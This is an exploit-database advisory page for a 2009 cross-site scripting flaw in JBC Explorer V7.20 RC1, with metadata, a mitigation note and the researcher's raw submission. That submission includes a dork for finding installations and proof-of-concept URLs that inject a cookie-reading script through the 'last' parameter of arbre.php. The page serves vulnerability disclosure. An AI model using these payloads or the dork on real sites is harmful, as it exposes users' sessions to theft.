header-logo
Suggest Exploit
vendor:
Explorer
by:
Metropolis
7.5
CVSS
HIGH
XSS vulnerability
79
CWE
Product Name: Explorer
Affected Version From: V7.20 Release Candidate 1 REV A
Affected Version To: V7.20 Release Candidate 1 REV A
Patch Exists: NO
Related CWE: N/A
CPE: a:jbc_explorer:explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Explorer V7.20

A Cross-Site Scripting (XSS) vulnerability was discovered in JBC Explorer V7.20 Release Candidate 1 REV A. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary HTML and script code in the context of the affected application.

Mitigation:

Input validation should be used to prevent Cross-Site Scripting attacks. All user-supplied input should be validated and filtered before being used in the application.
Source

Exploit-DB raw data:

###########################################
#
# Script Name : Explorer V7.20 
#
# Version :  V7.20 Release Candidate 1 REV A 
# 
# Bug Type : XSS vulnerability
#
# Found by : Metropolis 
#
# Discovered : 20 December 2009
#
# Download app : http://www.jbc-explorer.info/?action=download&download=16
#
# Dork : JBC explorer [ by Psykokwak & XaV ]
# 
###########################################
 
PoC :
 
http://[target]/[path]/dirsys/arbre.php?0=search&last=1[Xss]
 
example :
 
http://[target]/[path]/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>
 
local Example :
 
http://localhost/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>

[ Greetz: 
 
[~]: Frf2 Az£L Z£L EsSandRe ticlem007 the killers themic Lariane All www.metropolis.thebigbang.fr :[~]